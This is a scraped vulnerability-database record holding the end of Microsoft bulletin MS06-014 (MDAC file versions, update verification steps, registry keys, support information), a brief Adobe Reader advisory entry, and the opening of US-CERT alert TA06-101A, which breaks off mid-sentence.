0\r\n\t\r\n\r\n21-Feb-2006\r\n\t\r\n\r\n17:58\r\n\t\r\n\r\n53,520\r\n\t\r\n\r\nx86\r\n\r\nOdbcjt32.dll\r\n\t\r\n\r\n4.0.6306.0\r\n\t\r\n\r\n21-Feb-2006\r\n\t\r\n\r\n17:58\r\n\t\r\n\r\n278,800\r\n\t\r\n\r\nx86\r\n\r\nOddbse32.dll\r\n\t\r\n\r\n4.0.6306.0\r\n\t\r\n\r\n21-Feb-2006\r\n\t\r\n\r\n17:58\r\n\t\r\n\r\n20,752\r\n\t\r\n\r\nx86\r\n\r\nOdexl32.dll\r\n\t\r\n\r\n4.0.6306.0\r\n\t\r\n\r\n21-Feb-2006\r\n\t\r\n\r\n17:58\r\n\t\r\n\r\n20,752\r\n\t\r\n\r\nx86\r\n\r\nOdfox32.dll\r\n\t\r\n\r\n4.0.6306.0\r\n\t\r\n\r\n21-Feb-2006\r\n\t\r\n\r\n17:58\r\n\t\r\n\r\n20,752\r\n\t\r\n\r\nx86\r\n\r\nOdpdx32.dll\r\n\t\r\n\r\n4.0.6306.0\r\n\t\r\n\r\n21-Feb-2006\r\n\t\r\n\r\n17:58\r\n\t\r\n\r\n20,752\r\n\t\r\n\r\nx86\r\n\r\nOdtext32.dll\r\n\t\r\n\r\n4.0.6306.0\r\n\t\r\n\r\n21-Feb-2006\r\n\t\r\n\r\n17:58\r\n\t\r\n\r\n20,752\r\n\t\r\n\r\nx86\r\n\r\nOledb32.dll\r\n\t\r\n\r\n2.53.6306.0\r\n\t\r\n\r\n21-Feb-2006\r\n\t\r\n\r\n19:57\r\n\t\r\n\r\n483,328\r\n\t\r\n\r\nx86\r\n\r\nSqlsrv32.dll\r\n\t\r\n\r\n3.70.11.46\r\n\t\r\n\r\n28-Oct-2003\r\n\t\r\n\r\n21:44\r\n\t\r\n\r\n524,560\r\n\t\r\n\r\nx86\r\n\r\nDatasource.xml\r\n\t\r\n\r\n \r\n\t\r\n\r\n21-Feb-2006\r\n\t\r\n\r\n19:57\r\n\t\r\n\r\n24,532\r\n\t\r\n\r\n \r\n\r\nSqlse.rll\r\n\t\r\n\r\n1.1.2022.0\r\n\t\r\n\r\n17-Feb-2006\r\n\t\r\n\r\n23:04\r\n\t\r\n\r\n45,056\r\n\t\r\n\r\n \r\n\r\nSqlstpcustomdll.dll\r\n\t\r\n\r\n1.1.2022.0\r\n\t\r\n\r\n21-Feb-2006\r\n\t\r\n\r\n19:57\r\n\t\r\n\r\n1,843,712\r\n\t\r\n\r\nx86\r\n\r\nSqlstpcustomdll.rll\r\n\t\r\n\r\n1.1.2022.0\r\n\t\r\n\r\n17-Feb-2006\r\n\t\r\n\r\n23:04\r\n\t\r\n\r\n12,288\r\n\t\r\n\r\n \r\n\r\nMicrosoft Data Access Components 2.7 Service Pack 1:\r\nFile Name\tVersion\tDate\tTime\tSize\tCPU\r\n\r\nSprecovr.exe\r\n\t\r\n\r\n6.2.29.0\r\n\t\r\n\r\n18-Feb-2006\r\n\t\r\n\r\n06:51\r\n\t\r\n\r\n29,408\r\n\t\r\n\r\nx86\r\n\r\nSpupdsvc.exe\r\n\t\r\n\r\n6.2.29.0\r\n\t\r\n\r\n18-Feb-2006\r\n\t\r\n\r\n06:51\r\n\t\r\n\r\n22,752\r\n\t\r\n\r\nx86\r\n\r\nDbnetlib.dll\r\n\t\r\n\r\n2000.81.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n61,440\r\n\t\r\n\r\nx86\r\n\r\nMsadce.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n307,200\r\n\t\r\n\r\nx86\r\n\r\nMsadcf.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n57,344\r\n\t\r\n\r\nx86\r\n\r\nMsadco.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n135,168\r\n\t\r\n\r\nx86\r\n\r\nMsadcs.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n53,248\r\n\t\r\n\r\nx86\r\n\r\nMsadds.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n147,456\r\n\t\r\n\r\nx86\r\n\r\nMsado15.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n491,520\r\n\t\r\n\r\nx86\r\n\r\nMsadomd.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n159,744\r\n\t\r\n\r\nx86\r\n\r\nMsadox.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n180,224\r\n\t\r\n\r\nx86\r\n\r\nMsadrh15.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n53,248\r\n\t\r\n\r\nx86\r\n\r\nMsdaora.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n221,184\r\n\t\r\n\r\nx86\r\n\r\nMsdaprst.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n180,224\r\n\t\r\n\r\nx86\r\n\r\nMsdaps.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n188,416\r\n\t\r\n\r\nx86\r\n\r\nMsdarem.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n110,592\r\n\t\r\n\r\nx86\r\n\r\nMsdart.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n126,976\r\n\t\r\n\r\nx86\r\n\r\nMsdasql.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n303,104\r\n\t\r\n\r\nx86\r\n\r\nMsdfmap.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n32,768\r\n\t\r\n\r\nx86\r\n\r\nMsjro.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n90,112\r\n\t\r\n\r\nx86\r\n\r\nMsorcl32.dll\r\n\t\r\n\r\n2.573.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n131,072\r\n\t\r\n\r\nx86\r\n\r\nOdbc32.dll\r\n\t\r\n\r\n3.520.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n204,800\r\n\t\r\n\r\nx86\r\n\r\nOdbcbcp.dll\r\n\t\r\n\r\n2000.81.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n24,576\r\n\t\r\n\r\nx86\r\n\r\nOdbccp32.dll\r\n\t\r\n\r\n3.520.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n98,304\r\n\t\r\n\r\nx86\r\n\r\nOdbccr32.dll\r\n\t\r\n\r\n3.520.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n61,440\r\n\t\r\n\r\nx86\r\n\r\nOdbccu32.dll\r\n\t\r\n\r\n3.520.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n61,440\r\n\t\r\n\r\nx86\r\n\r\nOledb32.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n417,792\r\n\t\r\n\r\nx86\r\n\r\nSqloledb.dll\r\n\t\r\n\r\n2000.81.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n471,040\r\n\t\r\n\r\nx86\r\n\r\nSqlsrv32.dll\r\n\t\r\n\r\n2000.81.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n385,024\r\n\t\r\n\r\nx86\r\n\r\nSqlxmlx.dll\r\n\t\r\n\r\n2000.81.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n200,704\r\n\t\r\n\r\nx86\r\n\r\nDatasource.xml\r\n\t\r\n\r\n \r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n26,546\r\n\t\r\n\r\n \r\n\r\nSqlse.rll\r\n\t\r\n\r\n1.1.2022.0\r\n\t\r\n\r\n18-Feb-2006\r\n\t\r\n\r\n06:49\r\n\t\r\n\r\n45,056\r\n\t\r\n\r\n \r\n\r\nSqlstpcustomdll.dll\r\n\t\r\n\r\n1.1.2022.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n07:57\r\n\t\r\n\r\n1,843,712\r\n\t\r\n\r\nx86\r\n\r\nSqlstpcustomdll.rll\r\n\t\r\n\r\n1.1.2022.0\r\n\t\r\n\r\n18-Feb-2006\r\n\t\r\n\r\n06:49\r\n\t\r\n\r\n12,288\r\n\t\r\n\r\n \r\n\r\nMicrosoft Data Access Components 2.8:\r\nFile Name\tVersion\tDate\tTime\tSize\tCPU\r\n\r\ndbnetlib.dll\r\n\t\r\n\r\n2000.85.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n73,728\r\n\t\r\n\r\nx86\r\n\r\ndbnmpntw.dll\r\n\t\r\n\r\n2000.85.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n28,672\r\n\t\r\n\r\nx86\r\n\r\nmsadce.dll\r\n\t\r\n\r\n2.80.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n315,392\r\n\t\r\n\r\nx86\r\n\r\nmsadco.dll\r\n\t\r\n\r\n2.80.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n135,168\r\n\t\r\n\r\nx86\r\n\r\nmsadcs.dll\r\n\t\r\n\r\n2.80.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n49,152\r\n\t\r\n\r\nx86\r\n\r\nmsadds.dll\r\n\t\r\n\r\n2.80.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n147,456\r\n\t\r\n\r\nx86\r\n\r\nmsado15.dll\r\n\t\r\n\r\n2.80.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n507,904\r\n\t\r\n\r\nx86\r\n\r\nmsadomd.dll\r\n\t\r\n\r\n2.80.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n163,840\r\n\t\r\n\r\nx86\r\n\r\nmsadox.dll\r\n\t\r\n\r\n2.80.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n184,320\r\n\t\r\n\r\nx86\r\n\r\nmsadrh15.dll\r\n\t\r\n\r\n2.80.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n53,248\r\n\t\r\n\r\nx86\r\n\r\nmsdaora.dll\r\n\t\r\n\r\n2.80.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n225,280\r\n\t\r\n\r\nx86\r\n\r\nmsdaprst.dll\r\n\t\r\n\r\n2.80.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n192,512\r\n\t\r\n\r\nx86\r\n\r\nmsdart.dll\r\n\t\r\n\r\n2.80.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n147,456\r\n\t\r\n\r\nx86\r\n\r\nmsdasql.dll\r\n\t\r\n\r\n2.80.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n303,104\r\n\t\r\n\r\nx86\r\n\r\nmsorcl32.dll\r\n\t\r\n\r\n2.575.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n139,264\r\n\t\r\n\r\nx86\r\n\r\nodbc32.dll\r\n\t\r\n\r\n3.525.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n221,184\r\n\t\r\n\r\nx86\r\n\r\nodbcbcp.dll\r\n\t\r\n\r\n2000.85.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n24,576\r\n\t\r\n\r\nx86\r\n\r\noledb32.dll\r\n\t\r\n\r\n2.80.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n442,368\r\n\t\r\n\r\nx86\r\n\r\nsqloledb.dll\r\n\t\r\n\r\n2000.85.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n503,808\r\n\t\r\n\r\nx86\r\n\r\nsqlsrv32.dll\r\n\t\r\n\r\n2000.85.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n401,408\r\n\t\r\n\r\nx86\r\n\r\nsqlxmlx.dll\r\n\t\r\n\r\n2000.85.1062.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n208,896\r\n\t\r\n\r\nx86\r\n\r\ndatasource.xml\r\n\t\r\n\r\n \r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n25,166\r\n\t\r\n\r\n \r\n\r\nsqlse.rll\r\n\t\r\n\r\n1.01.2022.0000\r\n\t\r\n\r\n17-Feb-2006\r\n\t\r\n\r\n15:02\r\n\t\r\n\r\n45,056\r\n\t\r\n\r\nx86\r\n\r\nsqlstpcustomdll.dll\r\n\t\r\n\r\n1.01.2022.0000\r\n\t\r\n\r\n7-Mar-2006\r\n\t\r\n\r\n14:27\r\n\t\r\n\r\n1,843,712\r\n\t\r\n\r\nx86\r\n\r\nsqlstpcustomdll.rll\r\n\t\r\n\r\n1.01.2022.0000\r\n\t\r\n\r\n17-Feb-2006\r\n\t\r\n\r\n15:02\r\n\t\r\n\r\n12,288\r\n\t\r\n\r\nx86\r\n\r\nsprecovr.exe\r\n\t\r\n\r\n6.02.0029.0000\r\n\t\r\n\r\n17-Feb-2006\r\n\t\r\n\r\n15:04\r\n\t\r\n\r\n29,408\r\n\t\r\n\r\nx86\r\n\r\nspuninst.exe\r\n\t\r\n\r\n6.02.0029.0000\r\n\t\r\n\r\n17-Feb-2006\r\n\t\r\n\r\n15:04\r\n\t\r\n\r\n213,216\r\n\t\r\n\r\nx86\r\n\r\nspupdsvc.exe\r\n\t\r\n\r\n6.02.0029.0000\r\n\t\r\n\r\n17-Feb-2006\r\n\t\r\n\r\n15:04\r\n\t\r\n\r\n22,752\r\n\t\r\n\r\nx86\r\n\r\nMicrosoft Data Access Components 2.8 Service Pack 1:\r\nFile Name\tVersion\tDate\tTime\tSize\tCPU\r\n\r\nSprecovr.exe\r\n\t\r\n\r\n6.2.29.0\r\n\t\r\n\r\n17-Feb-2006\r\n\t\r\n\r\n22:04\r\n\t\r\n\r\n29,408\r\n\t\r\n\r\nx86\r\n\r\nSpupdsvc.exe\r\n\t\r\n\r\n6.2.29.0\r\n\t\r\n\r\n17-Feb-2006\r\n\t\r\n\r\n22:04\r\n\t\r\n\r\n22,752\r\n\t\r\n\r\nx86\r\n\r\nMsadco.dll\r\n\t\r\n\r\n2.81.1124.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n06:35\r\n\t\r\n\r\n143,360\r\n\t\r\n\r\nx86\r\n\r\nMsado15.dll\r\n\t\r\n\r\n2.81.1124.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n06:35\r\n\t\r\n\r\n524,288\r\n\t\r\n\r\nx86\r\n\r\nMsadomd.dll\r\n\t\r\n\r\n2.81.1124.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n06:35\r\n\t\r\n\r\n180,224\r\n\t\r\n\r\nx86\r\n\r\nMsadox.dll\r\n\t\r\n\r\n2.81.1124.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n06:35\r\n\t\r\n\r\n200,704\r\n\t\r\n\r\nx86\r\n\r\nMsdasql.dll\r\n\t\r\n\r\n2.81.1124.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n06:35\r\n\t\r\n\r\n307,200\r\n\t\r\n\r\nx86\r\n\r\nMsjro.dll\r\n\t\r\n\r\n2.81.1124.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n06:35\r\n\t\r\n\r\n102,400\r\n\t\r\n\r\nx86\r\n\r\nSqloledb.dll\r\n\t\r\n\r\n2000.85.1124.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n06:35\r\n\t\r\n\r\n520,192\r\n\t\r\n\r\nx86\r\n\r\nDatasource.xml\r\n\t\r\n\r\n \r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n06:35\r\n\t\r\n\r\n22,450\r\n\t\r\n\r\n \r\n\r\nSqlse.rll\r\n\t\r\n\r\n1.1.2022.0\r\n\t\r\n\r\n17-Feb-2006\r\n\t\r\n\r\n22:02\r\n\t\r\n\r\n45,056\r\n\t\r\n\r\n \r\n\r\nSqlstpcustomdll.dll\r\n\t\r\n\r\n1.1.2022.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n06:36\r\n\t\r\n\r\n1,843,712\r\n\t\r\n\r\nx86\r\n\r\nSqlstpcustomdll.rll\r\n\t\r\n\r\n1.1.2022.0\r\n\t\r\n\r\n17-Feb-2006\r\n\t\r\n\r\n22:02\r\n\t\r\n\r\n12,288\r\n\t\r\n\r\n \r\n\r\nVerifying that the Update Has Been Applied\r\n\u2022\t\r\n\r\nMicrosoft Baseline Security Analyzer\r\n\r\nTo verify that a security update has been applied to an affected system, you can use the Microsoft Baseline Security Analyzer (MBSA) tool. MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n\u2022\t\r\n\r\nFile Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Search.\r\n\r\n2.\r\n\t\r\n\r\nIn the Search Results pane, click All files and folders under Search Companion.\r\n\r\n3.\r\n\t\r\n\r\nIn the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n\r\n4.\r\n\t\r\n\r\nIn the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n\r\n5.\r\n\t\r\n\r\nOn the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n\u2022\t\r\n\r\nRegistry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry keys.\r\n\r\nMicrosoft Data Access Components 2.5 Service Pack 3:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\DataAccess\MDAC25\SP3\KB911562\Filelist\r\n\r\nMicrosoft Data Access Components 2.7 Service Pack 1:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\DataAccess\MDAC27\SP1\KB911562\Filelist\r\n\r\nMicrosoft Data Access Components 2.8:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\DataAccess\MDAC28\SP0\KB911562\Filelist\r\n\r\nMicrosoft Data Access Components 2.8 Service Pack 1:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\DataAccess\MDAC28\SP1\KB911562\Filelist\r\n\r\nNote This registry keys may not contain a complete list of installed files. Also, this registry key may not be created correctly when an administrator or an OEM integrates or slipstreams the 911562 security update into the Windows installation source files.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nGolan Yosef of Finjan's Malicious Code Research Center (MCRC) for working with Microsoft for the Microsoft Windows MDAC Vulnerability - CVE-2006-0003.\r\n\u2022\t\r\n\r\nStefano Meller and Mirko Gatto of Yarix for working with Microsoft for the Microsoft Windows MDAC Vulnerability - CVE-2006-0003.\r\n\r\nObtaining Other Security Updates:\r\n\r\nUpdates for other security issues are available at the following locations:\r\n\u2022\t\r\n\r\nSecurity updates are available in the Microsoft Download Center. You can find them most easily by doing a keyword search for "security_patch."\r\n\u2022\t\r\n\r\nUpdates for consumer platforms are available at the Microsoft Update Web site.\r\n\r\nSupport:\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nSecurity Resources:\r\n\u2022\t\r\n\r\nThe Microsoft TechNet Security Web site provides additional information about security in Microsoft products.\r\n\u2022\t\r\n\r\nMicrosoft Software Update Services\r\n\u2022\t\r\n\r\nMicrosoft Windows Server Update Services\r\n\u2022\t\r\n\r\nMicrosoft Baseline Security Analyzer (MBSA)\r\n\u2022\t\r\n\r\nWindows Update\r\n\u2022\t\r\n\r\nMicrosoft Update\r\n\u2022\t\r\n\r\nWindows Update Catalog: For more information about the Windows Update Catalog, see Microsoft Knowledge Base Article 323166.\r\n\u2022\t\r\n\r\nOffice Update \r\n\r\nSoftware Update Services:\r\n\r\nBy using Microsoft Software Update Services (SUS), administrators can quickly and reliably deploy the latest critical updates and security updates to Windows 2000 and Windows Server 2003-based servers, and to desktop systems that are running Windows 2000 Professional or Windows XP Professional.\r\n\r\nFor more information about how to deploy security updates by using Software Update Services, visit the Software Update Services Web site.\r\n\r\nWindows Server Update Services:\r\n\r\nBy using Windows Server Update Services (WSUS), administrators can quickly and reliably deploy the latest critical updates and security updates for Windows 2000 operating systems and later, Office XP and later, Exchange Server 2003, and SQL Server 2000 onto Windows 2000 and later operating systems.\r\n\r\nFor more information about how to deploy security updates using Windows Server Update Services, visit the Windows Server Update Services Web site.\r\n\r\nSystems Management Server:\r\n\r\nMicrosoft Systems Management Server (SMS) delivers a highly-configurable enterprise solution for managing updates. By using SMS, administrators can identify Windows-based systems that require security updates and can perform controlled deployment of these updates throughout the enterprise with minimal disruption to end users. For more information about how administrators can use SMS 2003 to deploy security updates, visit the SMS 2003 Security Patch Management Web site. SMS 2.0 users can also use Software Updates Service Feature Pack to help deploy security updates. For information about SMS, visit the SMS Web site.\r\n\r\nNote SMS uses the Microsoft Baseline Security Analyzer, the Microsoft Office Detection Tool, and the Enterprise Update Scanning Tool to provide broad support for security bulletin update detection and deployment. Some software updates may not be detected by these tools. Administrators can use the inventory capabilities of the SMS in these cases to target updates to specific systems. For more information about this procedure, visit the following Web site. Some security updates require administrative rights following a restart of the system. Administrators can use the Elevated Rights Deployment Tool (available in the SMS 2003 Administration Feature Pack and in the SMS 2.0 Administration Feature Pack) to install these updates.\r\n\r\nDisclaimer:\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions: \r\n\u2022\t\r\n\r\nV1.0 (April 11, 2006): Bulletin published.", "edition": 1, "modified": "2006-04-11T00:00:00", "published": "2006-04-11T00:00:00", "id": "SECURITYVULNS:DOC:12167", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12167", "title": "Microsoft Security Bulletin MS06-014 Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)", "type": "securityvulns", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-0509", "CVE-2009-1855", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1856", "CVE-2009-1857", "CVE-2009-0198"], "description": "Vulnerability is used in-the-wild for hidden malware installations. Recomendations are to disable PDF displaying inside browser and Javascript in PDF documents.\r\nBuffer overflow in JBIG2 decoding, buffer overflow in getIcon() javascript function.", "edition": 1, "modified": "2009-09-04T00:00:00", "published": "2009-09-04T00:00:00", "id": "SECURITYVULNS:VULN:9687", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9687", "title": "Adobe Acrobat / Reader code execution", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:17", "bulletinFamily": "software", "cvelist": ["CVE-2006-1186", "CVE-2006-1245", "CVE-2006-1185", "CVE-2006-1388", "CVE-2006-0012", "CVE-2006-1188", "CVE-2006-1359", "CVE-2006-0003", "CVE-2006-1189"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n\r\n National Cyber Alert System\r\n\r\n Technical Cyber Security Alert TA06-101A\r\n\r\n\r\nMicrosoft Windows and Internet Explorer Vulnerabilities\r\n\r\n Original release date: April 11, 2006\r\n Last revised: --\r\n Source: US-CERT\r\n\r\n\r\nSystems Affected\r\n\r\n * Microsoft Windows\r\n * Microsoft Internet Explorer\r\n\r\n For more complete information, refer to the Microsoft Security\r\n Bulletin Summary for April 2006.\r\n\r\n\r\nOverview\r\n\r\n Microsoft has released updates that address critical vulnerabilities\r\n in Microsoft Windows and Internet Explorer. Exploitation of these\r\n vulnerabilities could allow a remote, unauthenticated attacker to\r\n execute arbitrary code or cause a denial of service on a vulnerable\r\n system.\r\n\r\n\r\nI. Description\r\n\r\n Microsoft Security Bulletin Summary for April 2006 addresses\r\n vulnerabilities in Microsoft Windows and Internet Explorer. Further\r\n information is available in the following US-CERT Vulnerability Notes:\r\n\r\n\r\n VU#876678 - Microsoft Internet Explorer createTextRange()\r\n vulnerability \r\n\r\n Microsoft Internet Explorer fails to properly handle the\r\n createTextRange() DHTML method, possibly allowing a remote,\r\n unauthenticated attacker to execute arbitrary code.\r\n (CVE-2006-1359)\r\n\r\n\r\n VU#984473 - Microsoft Internet Explorer contains overflow in\r\n processing script action handlers \r\n\r\n A vulnerability in the Microsoft Internet Explorer web browser could\r\n allow a remote attacker to crash the browser or possibly execute\r\n arbitrary code on a vulnerable system.\r\n (CVE-2006-1245)\r\n\r\n\r\n VU#434641 - Microsoft Internet Explorer may automatically execute HTA\r\n files \r\n\r\n Microsoft Internet Explorer fails to properly handle HTA files. This\r\n vulnerability may allow a remote attacker to execute arbitrary code.\r\n (CVE-2006-1388)\r\n\r\n\r\n VU#503124 - Microsoft Internet Explorer fails to handle specially\r\n crafted, malformed HTML \r\n\r\n Microsoft Internet Explorer fails to properly handle malformed HTML.\r\n This vulnerability may allow a remote attacker to execute arbitrary\r\n code on a vulnerable system.\r\n (CVE-2006-1185)\r\n\r\n\r\n VU#959049 - Multiple COM objects cause memory corruption in Microsoft\r\n Internet Explorer \r\n\r\n Microsoft Internet Explorer allows instantiation of COM objects not\r\n designed for use in the browser, which may allow a remote attacker to\r\n execute arbitrary code or crash 